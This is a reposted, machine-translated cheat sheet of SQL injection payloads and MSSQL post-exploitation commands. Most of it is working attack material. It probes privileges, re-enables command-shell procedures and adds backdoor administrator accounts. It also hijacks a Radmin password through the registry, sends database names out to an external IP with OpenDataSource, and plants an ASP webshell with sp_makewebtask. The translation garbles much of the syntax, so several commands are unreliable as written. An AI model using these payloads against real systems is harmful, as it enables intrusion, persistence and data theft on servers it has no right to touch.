[Import] Some injection commands commonly used by a d SQL injection tool

// Check the permissions.
And 1 = (select is_member ('db _ owner '))
And char (124) % 2 bcast (is_member ('db _ owner') as varchar (1) % 2 bchar (124) = 1 ;--

// Check whether you have the permission to read a database
And 1 = (select has_dbaccess ('master '))
And char (124) % 2 bcast (has_dbaccess ('master') as varchar (1) % 2 bchar (124) = 1 --

Numeric type
And char (124) % 2 Buser % 2 bchar (124) = 0

Character Type
'And char (124) % 2 Buser % 2 bchar (124) = 0 and ''='

Search type
'And char (124) % 2 Buser % 2 bchar (124) = 0 and' % '='

Brute-force Username
And user> 0
'And user> 0 and ''='

Check whether the permission is sa
And 1 = (select is_srvrolemember ('sysadmin '));--
And char (124) % 2 bcast (is_srvrolemember (0x730079007300610064006d0069006e00) as varchar (1) % 2 bchar (124) = 1 --

Check whether MSSQL database is used
And exists (select * From sysobjects );--

Check whether multiple rows are supported
; Declare @ d int ;--

Restore xp_mongoshell
; Exec master .. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--

Select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')

//-----------------------
// Execute the command
//-----------------------
First, enable the sandbox mode:
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1

Then run the system command using jet. oledb.
Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')

Execute Command
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add ';--

EXEC [master]. [dbo]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'

Determine whether the xp_mongoshell extended storage process exists:
Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell ')

Write registry
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1

REG_SZ

Read Registry
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'

Read directory content
Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1

Database Backup
Backup database pubs to disk = 'C: \ 123. Bak'

// Burst length
And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--

To change the sa password, run the following command:
Exec sp_password NULL, 'new password', 'sa'

Test:
Exec master. DBO. sp_addlogin test, ptlove
Exec master. DBO. SP_ADDSRVROLEMEMBER test, SysAdmin

Delete the xp_mongoshell statement in the extended stored procedure:
Exec sp_dropextendedproc 'xp _ export shell'

Added extended storage process
Exec [Master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'
Grant exec on xp_proxiedadata to public

Stop or activate a service.

Exec master.. xp_servicecontrol 'stop', 'schedule'
Exec master.. xp_servicecontrol 'start', 'schedule'

DBO. xp_subdirs

Only list subdirectories in a directory.
Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ sqlinject \ login. asp'

DBO. xp_makecab

Compress multiple target files to a specific target file.
All files to be compressed can be connected to the end of the parameter column and separated by commas.

DBO. xp_makecab
'C: \ test. cab', 'mszip ', 1,
'C: \ Inetpub \ wwwroot \ sqlinject \ login. asp ',
'C: \ Inetpub \ wwwroot \ SQLInject \ securelogin. asp'

Xp_terminate_process

Stop a program in execution, but assign the Process ID parameter.
Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.

Xp_terminate_process 2484

Xp_unpackcab

Uncompress the file.

Xp_unpackcab 'C: \ test. cab', 'c: \ temp ', 1

A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed. net.exe does not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Run the following command to EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change port value to 1234

Create database lcx;
Create TABLE ku (name nvarchar (256) null );
Create TABLE biao (id int NULL, name nvarchar (256) null );

// Obtain the Database Name
Insert into OpenDataSource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; Pwd = pafpaf; database = lcx '). LCX. DBO. ku select name from master. DBO. sysdatabases

// Create a table in the master to check the Permissions
Create Table master .. d_test (ID nvarchar (4000) null, data nvarchar (4000) null );--

Use sp_makewebtask to directly write a sentence in the web directory:
''% 20'"> http: // 127.0.0.1/dblogin123.asp? Username = 123 '; Exec % 20sp_makewebtask % 20 'd: \ www \ TT \ 88. ASP ',' % 20 select % 20 ''<% 25 execute (Request (" A ") % 25>'' % 20 ';--

// Update table content
Update films set kind = 'dramatic 'Where id = 123

// Delete content
Delete from table_name where stockid = 3

Source: http://Jorkin.Reallydo.Com/default.asp? Id = 569